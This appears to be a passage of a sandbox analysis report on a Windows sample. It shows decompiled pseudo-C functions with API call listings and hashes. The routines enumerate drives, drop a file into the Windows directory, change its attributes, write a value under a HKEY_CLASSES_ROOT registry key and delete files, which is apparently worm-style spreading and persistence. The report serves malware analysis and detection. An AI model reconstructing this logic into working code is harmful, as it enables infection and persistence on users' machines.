					} while ( *0x40a030 != 0);
					goto L5;
				}
			}

0x00402f9e
0x00402fbb
0x00402fd3
0x00402fda
0x00402fdc
0x00402fe1
0x00402fe8
0x00402fe8
0x00402fed
0x00402ff1
0x00402ffa
0x00402ffa
0x00402ffd
0x00403006
0x0040300d
0x00403012
0x00403014
0x00403019
0x0040301c
0x0040301c
0x0040301f
0x00403022
0x00403029
0x00403029
0x00403022
0x00403012
0x0040302e
0x00403037
0x00403039
0x00403039
0x00403040
0x00403042
0x00403042
0x0040304a
0x00403053
0x00403055
0x00403055
0x0040305e
0x0040305e
0x0040306f
0x0040306f
0x00403071
0x00000000
0x00402fc2
0x00402fc2
0x00402fc8
0x00402fcc
0x00402fce
0x00000000
0x00402fc2

APIs

FreeLibrary.KERNEL32(00400000,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000,00402460), ref: 00403029
ExitProcess.KERNEL32(00000000,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000,00402460), ref: 0040305E

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: e87d145c5cbc11a3b1b75d0fafe500ddba1f5edf94dcaa2e3019682a10fbe1e7
Instruction ID: 4b2d42af59d3b1d8e88fe9e31da9e43e6ca94f4fbd885f656fef1c50f2c896c1
Opcode Fuzzy Hash: e87d145c5cbc11a3b1b75d0fafe500ddba1f5edf94dcaa2e3019682a10fbe1e7
Instruction Fuzzy Hash: 1C216D709013418BEB21AF65C6883537BA9AF45315F2444BBD844A72DAD7BCCDC4CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402FA0, Relevance: 3.1, APIs: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00402FA0() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x0040A648 != 0 ||  *0x40a030 == 0) {
					L4:
					if( *0x409004 != 0) {
						E00402E8C();
						E00402F18(_t35);
						 *0x409004 = 0;
					}
					L6:
					if( *((char*)(0x40a648)) == 2 &&  *0x409000 == 0) {
						 *0x0040A62C = 0;
					}
					E00402D8C();
					if( *((char*)(0x40a648)) <= 1 ||  *0x409000 != 0) {
						_t16 =  *0x0040A630;
						if( *0x0040A630 != 0) {
							E00403C00(_t16);
							_t38 =  *((intOrPtr*)(0x40a630));
							_t7 = _t38 + 0x10; // 0x0
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x400000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E00402D64();
					if( *((char*)(0x40a648)) == 1) {
						 *0x0040A644();
					}
					if( *((char*)(0x40a648)) != 0) {
						E00402EE8();
					}
					if( *0x40a620 == 0) {
						if( *0x40a018 != 0) {
							 *0x40a018();
						}
						ExitProcess( *0x409000); // executed
					}
					memcpy(0x40a620,  *0x40a620, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x409000 = 0x409000;
					goto L6;
				} else {
					do {
						 *0x40a030 = 0;
						 *((intOrPtr*)( *0x40a030))();
					} while ( *0x40a030 != 0);
					goto L4;
				}
			}

0x00402fbb
0x00402fd3
0x00402fda
0x00402fdc
0x00402fe1
0x00402fe8
0x00402fe8
0x00402fed
0x00402ff1
0x00402ffa
0x00402ffa
0x00402ffd
0x00403006
0x0040300d
0x00403012
0x00403014
0x00403019
0x0040301c
0x0040301c
0x0040301f
0x00403022
0x00403029
0x00403029
0x00403022
0x00403012
0x0040302e
0x00403037
0x00403039
0x00403039
0x00403040
0x00403042
0x00403042
0x0040304a
0x00403053
0x00403055
0x00403055
0x0040305e
0x0040305e
0x0040306f
0x0040306f
0x00403071
0x00000000
0x00402fc2
0x00402fc2
0x00402fc8
0x00402fcc
0x00402fce
0x00000000
0x00402fc2

APIs

FreeLibrary.KERNEL32(00400000,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000,00402460), ref: 00403029
ExitProcess.KERNEL32(00000000,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000,00402460), ref: 0040305E

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: 13075f1f07cc84eb7334053c3716d9a8ce4deda8e863971867078cc8782122a9
Instruction ID: 1b03414f8cc1a74ea96aefb4ecc0c7aba41324da9db28816bc81a4039e10204c
Opcode Fuzzy Hash: 13075f1f07cc84eb7334053c3716d9a8ce4deda8e863971867078cc8782122a9
Instruction Fuzzy Hash: D8217F709013418BEB20AF65C6883537BA8AF44315F24447BD844A62DAD3BCCDC0CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 004075EC, Relevance: 3.1, APIs: 2, Instructions: 63
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004075EC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v8;
				char _v12;
				void* _t11;
				void* _t17;
				void* _t32;
				intOrPtr _t38;
				void* _t45;
				void* _t47;
				intOrPtr _t50;

				_t57 = __fp0;
				_t46 = __esi;
				_t49 = _t50;
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t50);
				_push(0x4076ae);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50; // executed
				_t11 = E00406EE4(__ebx, __ecx, __edi, __esi, __eflags, __fp0); // executed
				if(_t11 != 0) {
					E004070D0( &E004091C8, 0x14, 0x14);
					_t17 = E00404018(0, 0,  &E004091C8); // executed
					_t45 = _t17;
					if(GetLastError() != 0xb7) {
						_t41 = 0; // executed
						E00406D40( &_v8, __ebx, 0, _t45, __esi); // executed
						_t32 = E0040320C(_v8);
						_t54 = _t32;
						if(_t32 > 0) {
							_t47 = 1;
							do {
								E004031B4();
								_t41 = 0x4076c4;
								E00403214( &_v12, 0x4076c4);
								E00407504(_v12, _t32, _t45, _t47, _t54, _t49); // executed
								_pop(0x14);
								_t47 = _t47 + 1;
								_t32 = _t32 - 1;
								_t55 = _t32;
							} while (_t32 != 0);
						}
						E00406E5C(_t32, 0x14, _t41, _t45, _t46, _t55, _t57); // executed
						ReleaseMutex(_t45);
					}
				}
				_pop(_t38);
				 *[fs:eax] = _t38;
				_push(E004076B5);
				return E004030B8( &_v12, 2);
			}

0x004075ec
0x004075ec
0x004075ed
0x004075ef
0x004075f1
0x004075f3
0x004075f4
0x004075f5
0x004075f8
0x004075f9
0x004075fe
0x00407601
0x00407604
0x0040760b
0x00407620
0x0040762e
0x00407633
0x0040763f
0x00407644
0x00407646
0x00407653
0x00407655
0x00407657
0x00407659
0x0040765e
0x00407669
0x00407671
0x00407676
0x0040767e
0x00407683
0x00407684
0x00407685
0x00407685
0x00407685
0x0040765e
0x00407688
0x0040768e
0x0040768e
0x0040763f
0x00407695
0x00407698
0x0040769b
0x004076ad

APIs

Part of subcall function 00404018: CreateMutexA.KERNEL32(004082B4,0040829A,00408299,?,00407633,00000000,00000000,004091C8,00000000,004076AE,?,?,?,?,00000000,00000000), ref: 0040402E

GetLastError.KERNEL32(00000000,00000000,004091C8,00000000,004076AE,?,?,?,?,00000000,00000000,?,00408299,00000000,004082B4), ref: 00407635

Part of subcall function 00406D40: GetLogicalDriveStringsA.KERNEL32 ref: 00406D79

ReleaseMutex.KERNEL32(00000000,00000000,00000000,004091C8,00000000,004076AE,?,?,?,?,00000000,00000000,?,00408299,00000000,004082B4), ref: 0040768E

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Mutex$CreateDriveErrorLastLogicalReleaseStrings
String ID:
API String ID: 676290295-0
Opcode ID: a7fbf6034958b4fe9c4b2cac68f2d44de7b39340100825a41240966576ee12d4
Instruction ID: 60ede757cd03df7f7e383a19fd6d957addfed1e0a6cd2c6079e719d7f31b4fc7
Opcode Fuzzy Hash: a7fbf6034958b4fe9c4b2cac68f2d44de7b39340100825a41240966576ee12d4
Instruction Fuzzy Hash: 72110D30A047086ADB10FBA6C842B5E7B5DCB85714F6144BBF6017B3C3CA3EAD04455D

Uniqueness

Uniqueness Score: -1.00%

Function 004012A0, Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004012A0(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E00401154(0x40a5d4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}

0x004012a3
0x004012ad
0x004012bc
0x004012af
0x004012af
0x004012af
0x004012c2
0x004012cf
0x004012d4
0x004012d6
0x004012da
0x004012e3
0x004012ea
0x004012f6
0x004012fd
0x00000000
0x004012fd
0x004012ea
0x00401302

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004015A9), ref: 004012CF
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004015A9), ref: 004012F6

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 677c0526faf000c49acf14ba7c711909bb3502ece2a084bb3d0e397bba4ce0ca
Instruction ID: 90e8f67b1060bd1251f945ff82b9078c1ba764c12e4cd0c6011b14969f372c3f
Opcode Fuzzy Hash: 677c0526faf000c49acf14ba7c711909bb3502ece2a084bb3d0e397bba4ce0ca
Instruction Fuzzy Hash: 97F02773B006205BEB206A6A4D81B4369C59F59B90F1400BAFB4CFF3D9DA798C0043A9

Uniqueness

Uniqueness Score: -1.00%

Function 004079F0, Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E004079F0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t28;
				void* _t38;
				CHAR* _t50;
				void* _t55;
				intOrPtr _t69;
				intOrPtr _t82;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(_t82);
				_push(0x407b0a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82;
				E004070D0(0x4091e0, 0xb, 0xb);
				E004031F4( &_v12, 0xb, 0x4091e0);
				_push(_v12);
				E00404F90( &_v16, __ebx, 0xb);
				_pop(_t55);
				E00403258( &_v8, _t55, _v16);
				_t50 = E0040340C(_v8);
				_t28 = E00404BF8(_t50, _t50, 0xa200, 0x40a698, __edi, __esi); // executed
				if(_t28 != 0) {
					SetFileAttributesA(_t50, 1); // executed
					E004070D0(0x4091ec, 0x1a, 0x1a);
					E004031F4( &_v20, 0x1a, 0x4091ec);
					_t38 = E0040575C(0x80000000, 0x1a, _v20);
					E004070D0(0x409208, 8, 8);
					E004031F4( &_v28, 8, 0x409208);
					E00403258( &_v24, _v28, _v8);
					E0040578C(_t38, _v24, 0);
					E004057CC(_t38);
				}
				_pop(_t69);
				 *[fs:eax] = _t69;
				_push(E00407B11);
				return E004030B8( &_v28, 6);
			}

0x004079f5
0x004079f6
0x004079f7
0x004079f8
0x004079f9
0x004079fa
0x004079fb
0x004079fe
0x004079ff
0x00407a04
0x00407a07
0x00407a19
0x00407a2b
0x00407a33
0x00407a37
0x00407a42
0x00407a43
0x00407a50
0x00407a5e
0x00407a65
0x00407a6e
0x00407a82
0x00407a94
0x00407aa1
0x00407ab7
0x00407ac9
0x00407ad7
0x00407ae3
0x00407aea
0x00407aea
0x00407af1
0x00407af4
0x00407af7
0x00407b09

APIs

Part of subcall function 00404F90: GetWindowsDirectoryA.KERNEL32(?,00000105,00000000,00404FFA,?,?,?,00407F4A,00000000,004080B4,?,?,00000000,00000000,?,00408230), ref: 00404FBE

SetFileAttributesA.KERNEL32(00000000,00000001,00000000,00407B0A,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00408294,00000000,004082B4), ref: 00407A6E

Part of subcall function 0040575C: RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,0002001F), ref: 00405774

Part of subcall function 0040578C: RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000001), ref: 004057B7

Part of subcall function 004057CC: RegCloseKey.ADVAPI32(00000000), ref: 004057D1

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesCloseDirectoryFileOpenValueWindows
String ID:
API String ID: 518328669-0
Opcode ID: 37c7ef60342c10171402bf8b6aa12256d853dba7da83d68c8757f37245a1931c
Instruction ID: 9fb6b2ab8070126e3dd3ea97227683d9e4bb0d8c5dfb905a3ced1fb699aa51c5
Opcode Fuzzy Hash: 37c7ef60342c10171402bf8b6aa12256d853dba7da83d68c8757f37245a1931c
Instruction Fuzzy Hash: BD2153307042095BEB04EAA5C85279F776DEB89304F50847EB105BB3C6DE3CEE05976A

Uniqueness

Uniqueness Score: -1.00%

Function 00405200, Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00405200(void* __eax, void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t22;
				void* _t30;
				void* _t31;
				void* _t39;
				intOrPtr _t41;
				intOrPtr _t46;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t30 = __eax;
				_push(_t46);
				_push(0x405291);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46;
				E00404ED0(__eax,  &_v16);
				_push(_v16);
				E00404EEC( &_v20);
				_pop(_t39); // executed
				E00405080(_v20, _t30,  &_v8, _t39, __esi); // executed
				_t31 = 1;
				while(_v8 != 0) {
					E00404798( &_v8,  &_v12, E004052A8);
					if(_t31 == 0 || DeleteFileA(E0040340C(_v12)) == 0) {
						_t22 = 0;
					} else {
						_t22 = 1;
					}
					_t31 = _t22;
				}
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E00405298);
				return E004030B8( &_v20, 4);
			}

0x00405205
0x00405206
0x00405207
0x00405208
0x0040520a
0x0040520e
0x0040520f
0x00405214
0x00405217
0x0040521f
0x00405227
0x0040522d
0x00405238
0x00405239
0x0040523e
0x00405270
0x0040524d
0x00405254
0x00405268
0x0040526c
0x0040526c
0x0040526c
0x0040526e
0x0040526e
0x00405278
0x0040527b
0x0040527e
0x00405290

APIs

Part of subcall function 00405080: FindFirstFileA.KERNEL32(00000000,?,00000000,004051DB,?,?,?,?,0040523E,00000000,00405291,?,?,00000000,00000000,00000000), ref: 0040513B
Part of subcall function 00405080: FindClose.KERNEL32(00000000,00000000,00000010), ref: 004051AB

DeleteFileA.KERNEL32(00000000,00000000,00405291,?,?,00000000,00000000,00000000,00000000,?,00407786,?,?,?,00000000,004079DC), ref: 0040525F

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFind$CloseDeleteFirst
String ID:
API String ID: 3969940835-0
Opcode ID: 1c55784394cbe84bee6b2702f2cf342c50be2177c9b783b5e1391ce42a9cf0bd
Instruction ID: 7b79426e1ef5d484ccb35ed710867a40efa654d54104ddfac4c0367765dd07f6
Opcode Fuzzy Hash: 1c55784394cbe84bee6b2702f2cf342c50be2177c9b783b5e1391ce42a9cf0bd
Instruction Fuzzy Hash: BF01A174604608AFDB04EBA1CC529AF73ACEF45304F5048BEF901B3281E678AE059E68

Uniqueness

Uniqueness Score: -1.00%

Function 0040578C, Relevance: 1.5, APIs: 1, Instructions: 31
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040578C(void* __eax, void* __ecx, void* __edx) {
				void* _t4;
				char* _t7;
				long _t10;
				void* _t12;

				_t12 = __eax;
				if(__eax == 0) {
					L2:
					return 0;
				}
				_t4 = E0040320C(__ecx);
				_t7 = E0040340C(__ecx);
				_t10 = RegSetValueExA(_t12, E0040340C(__edx), 0, 1, _t7, _t4 + 1); // executed
				if(_t10 == 0) {
					return 1;
				}
				goto L2;
			}

0x00405793
0x00405797
0x004057c0
0x00000000
0x004057c0
0x0040579b
0x004057a4
0x004057b7
0x004057be
0x00000000
0x004057c4
0x00000000

APIs

RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000001), ref: 004057B7

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: a39acc87a320c457c97e3fcf7c35d64c003120a672a4eba49a3de817e775daa7
Instruction ID: 82ccab74ab13a132c34841d8e2f7e51fc97cb509c9d1c97b6ea97491bda523d5
Opcode Fuzzy Hash: a39acc87a320c457c97e3fcf7c35d64c003120a672a4eba49a3de817e775daa7
Instruction Fuzzy Hash: 17E04F5131061166E511256A0CC1A7B0D9D8B44A56F04043BB904EF2C3D968CD0321A9

Uniqueness

Uniqueness Score: -1.00%

Function 00406CA8, Relevance: 1.5, APIs: 1, Instructions: 24
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406CA8(void* __eax, int __ecx, void* __edx) {
				char* _t6;
				void* _t7;
				void* _t8;
				void* _t11;
				int _t16;

				_t16 = __ecx;
				_t11 = __eax;
				E004064E4(__eax);
				_t6 = E0040340C(__edx);
				_t7 =  *0x40a650; // 0x400000
				_t8 = ExtractIconA(_t7, _t6, _t16); // executed
				if(_t8 > 1) {
					return E00406520(_t11, _t8);
				}
				return _t8;
			}

0x00406cab
0x00406caf
0x00406cb3
0x00406cbb
0x00406cc1
0x00406cc7
0x00406ccf
0x00000000
0x00406cd4
0x00406cdc

APIs

Part of subcall function 004064E4: DestroyCursor.USER32 ref: 004064F3

ExtractIconA.SHELL32(00400000,00000000,00000000), ref: 00406CC7

Part of subcall function 00406520: GetIconInfo.USER32 ref: 00406540
Part of subcall function 00406520: GetObjectA.GDI32(?,00000018,?), ref: 00406551
Part of subcall function 00406520: DeleteObject.GDI32(?), ref: 00406566
Part of subcall function 00406520: DeleteObject.GDI32(?), ref: 00406574

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Object$DeleteIcon$CursorDestroyExtractInfo
String ID:
API String ID: 2619871307-0
Opcode ID: 74285d1847785c8b7a0ffe10bc799c48b5441249807337defad3f1cff0e2ca0f
Instruction ID: 3dd68c7f1dd4f5608f9b9662a0ba171f3b5b53225b24c93893625578eb0e5390
Opcode Fuzzy Hash: 74285d1847785c8b7a0ffe10bc799c48b5441249807337defad3f1cff0e2ca0f
Instruction Fuzzy Hash: 32D05E767002202BC321B6BF2CC181B8ADDCACA269316453FB109F7293C97DCC12126D

Uniqueness

Uniqueness Score: -1.00%

Function 0040575C, Relevance: 1.5, APIs: 1, Instructions: 22
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040575C(void* __eax, void* __ecx, void* __edx) {
				long _t4;
				void* _t7;
				void** _t12;

				_t7 = __eax;
				_t4 = RegOpenKeyExA(_t7, E0040340C(__edx), 0, 0x2001f, _t12); // executed
				if(_t4 != 0) {
					 *_t12 = 0;
				}
				return  *_t12;
			}

0x00405761
0x00405774
0x0040577b
0x0040577f
0x0040577f
0x00405788

APIs

RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,0002001F), ref: 00405774

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 3e0342fc476e020449fc2feaf9da61491b72adc0fc7bf6674d6e75a2bba3e8fc
Instruction ID: 3a3203429d587fd7172cf24d4e67cc15a32e0ac6e1cd073cd859d0159acdf75a
Opcode Fuzzy Hash: 3e0342fc476e020449fc2feaf9da61491b72adc0fc7bf6674d6e75a2bba3e8fc
Instruction Fuzzy Hash: 7AD05EA13046107EE210B62A5C81FBB6ACCCB487A6F00053AF948E6283D225CD0052A5

Uniqueness

Uniqueness Score: -1.00%

Function 00404F34, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404F34(void* __eax, void* __edx) {
				char _v268;
				long _t6;
				void* _t13;
				void* _t14;

				_t13 = __edx;
				_t6 = GetShortPathNameA(E0040340C(__eax),  &_v268, 0x104); // executed
				return E00403184(_t13, _t6, _t14);
			}

0x00404f3c
0x00404f52
0x00404f6a

APIs

GetShortPathNameA.KERNEL32 ref: 00404F52

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: NamePathShort
String ID:
API String ID: 1295925010-0
Opcode ID: 62dbab301fac9f01e5f6ee26ec870bc2c777410598d2341c0e10a02dc047d70f
Instruction ID: 14e814bc68ad69d6c3dbd45ca29a6777f0e45ac5a2bbd03733d3eefc14da3dab
Opcode Fuzzy Hash: 62dbab301fac9f01e5f6ee26ec870bc2c777410598d2341c0e10a02dc047d70f
Instruction Fuzzy Hash: C9D05EE1B0021027D200B66D1CC2A9BA6CC4B88729F14413A7758EB2D2E9798E1402D9

Uniqueness

Uniqueness Score: -1.00%

Function 00404B68, Relevance: 1.5, APIs: 1, Instructions: 18
fileCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00404B68(CHAR* __eax, unsigned int __edx) {
				CHAR* _t1;
				void* _t2;
				long _t6;
				long _t9;

				_t9 = __edx;
				_t1 = __eax;
				_push(0);
				_t6 = __edx >> 0x00000010 & 0x00001fff;
				if(_t6 == 0) {
					_t6 = 0x80;
				}
				_t2 = CreateFileA(_t1, 0, _t9, 0, _t9, _t6, ??); // executed
				return _t2;
			}

0x00404b68
0x00404b68
0x00404b6a
0x00404b70
0x00404b75
0x00404b77
0x00404b77
0x00404b88
0x00404b8d

APIs

CreateFileA.KERNEL32(004082B4,80000301,80000301,00000000,80000301,80000301,00000000), ref: 00404B88

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eea2c6d1fddd31fd331317c09d3e296815bd40418f117fca415fb9ec57fe0382
Instruction ID: ecc9e2cd6cddaadd7fb33e9927afed1fcbe410aa9616ae81c498ff4a473f225f
Opcode Fuzzy Hash: eea2c6d1fddd31fd331317c09d3e296815bd40418f117fca415fb9ec57fe0382
Instruction Fuzzy Hash: F9C012E15641113EFA0C22587C37FBB128D83D4714C90962EB206A77D1C458280041AC

Uniqueness

Uniqueness Score: -1.00%

Function 00404BC4, Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404BC4(void* __eax, long __ecx, void* __edx) {
				int _t2;
				void* _t3;
				DWORD* _t8;

				_t2 = ReadFile(__eax, __edx, __ecx, _t8, 0); // executed
				_t3 = 0;
				if(_t2 == 0) {
					return 0;
				}
				return _t3;
			}

0x00404bcf
0x00404bd6
0x00404bd7
0x00000000
0x00404bd9
0x00404bdc

APIs

ReadFile.KERNEL32(00000000,0040A698,?,?,00000000), ref: 00404BCF

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 07c637d247b66d3b0a9c7b3941f0c52b1614d40a6673a640bb3ecb2c78beae31
Instruction ID: 3ae4d4c2ce5489376b9a0e409b07906e0c93d400668ceedc4e43a286d92feaa2
Opcode Fuzzy Hash: 07c637d247b66d3b0a9c7b3941f0c52b1614d40a6673a640bb3ecb2c78beae31
Instruction Fuzzy Hash: DEC04CA12582083AF51061A29C16F23355CC781799F12456AB704E51D1F096F81000A9

Uniqueness

Uniqueness Score: -1.00%

Function 00404BE0, Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404BE0(void* __eax, long __ecx, void* __edx) {
				int _t2;
				void* _t3;
				void* _t7;
				DWORD* _t9;

				_t2 = WriteFile(__eax, __edx, __ecx, _t9, 0); // executed
				_t3 = _t7;
				if(_t2 == 0) {
					return 0;
				}
				return _t3;
			}

0x00404bea
0x00404bf1
0x00404bf2
0x00000000
0x00404bf4
0x00404bf7

APIs

WriteFile.KERNEL32(00000000,0040A698,0000A200,?,00000000), ref: 00404BEA

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 83a29245ac6b35b996f4ce35e430c7ef2da10dd3d2364903d861bf1a917f60bf
Instruction ID: cd8d274a544879f86d75f83ceab2a9824fbef203ff2d66308718860d554d7d3d
Opcode Fuzzy Hash: 83a29245ac6b35b996f4ce35e430c7ef2da10dd3d2364903d861bf1a917f60bf
Instruction Fuzzy Hash: 4EC04CA11582083AF51051A7AC06F233A5CC781698F114436BB08E1581F456F8011079

Uniqueness

Uniqueness Score: -1.00%

Function 00404018, Relevance: 1.5, APIs: 1, Instructions: 14
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00404018(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}

0x0040401b
0x00404023
0x0040402e
0x00404034

APIs

CreateMutexA.KERNEL32(004082B4,0040829A,00408299,?,00407633,00000000,00000000,004091C8,00000000,004076AE,?,?,?,?,00000000,00000000), ref: 0040402E

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
Instruction ID: 31d529539147b31f913da60fb79b32c9d72b995d2910e43382fd7a33128a04fb
Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
Instruction Fuzzy Hash: 8AC01273150248ABC700EEA9DC05D9B33DC5758609B008825B618D7100C139E5909B64

Uniqueness

Uniqueness Score: -1.00%

Function 00404EB0, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00404EB0(void* __eax) {
				int _t4;

				_t4 = CreateDirectoryA(E0040340C(__eax), 0); // executed
				asm("sbb eax, eax");
				return _t4 + 1;
			}

0x00404ebd
0x00404ec5
0x00404ec9

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,00404E7A,00000000,00404E9F,?,?,00000000,00000000,00000000,00000000,?,00407724,00000000,004079DC), ref: 00404EBD

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 8bf82e50c95cb5f66b68f8dd7c0e4e068ce367b84ccf8919175486f573103c26
Instruction ID: 54881843ca4f04485c80971131db710ee83c2c1d717b1f588eca7c15a420d4f4
Opcode Fuzzy Hash: 8bf82e50c95cb5f66b68f8dd7c0e4e068ce367b84ccf8919175486f573103c26
Instruction Fuzzy Hash: 71B092927542401AEA003ABA2CC2B2A098C974460EF10093AF206EA283D47AC9050014

Uniqueness

Uniqueness Score: -1.00%

Function 00404B9C, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404B9C() {
				void* _t3;
				long _t5;
				void* _t6;
				void* _t10;

				_t5 = GetFileAttributesA(E00404490(_t3)); // executed
				_t6 = _t5 + 1;
				_t10 = _t6;
				if(_t10 != 0) {
					return _t6 - 0x00000001 & 0 | _t10 == 0x00000000;
				}
				return _t6;
			}

0x00404ba2
0x00404ba7
0x00404ba7
0x00404ba8
0x00000000
0x00404bad
0x00404bb0

APIs

GetFileAttributesA.KERNEL32(00000000,00407F71,00000000,004080B4,?,?,00000000,00000000,?,00408230,00000000,004082B4), ref: 00404BA2

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 091cded7cb7972e4fd2327d9495d277d5f029eeaa818ee99f85e51ed0cdc517d
Instruction ID: b116303671e024f583cda4c1147e2dbfbac77b887c659148fe5224e5fd1b100a
Opcode Fuzzy Hash: 091cded7cb7972e4fd2327d9495d277d5f029eeaa818ee99f85e51ed0cdc517d
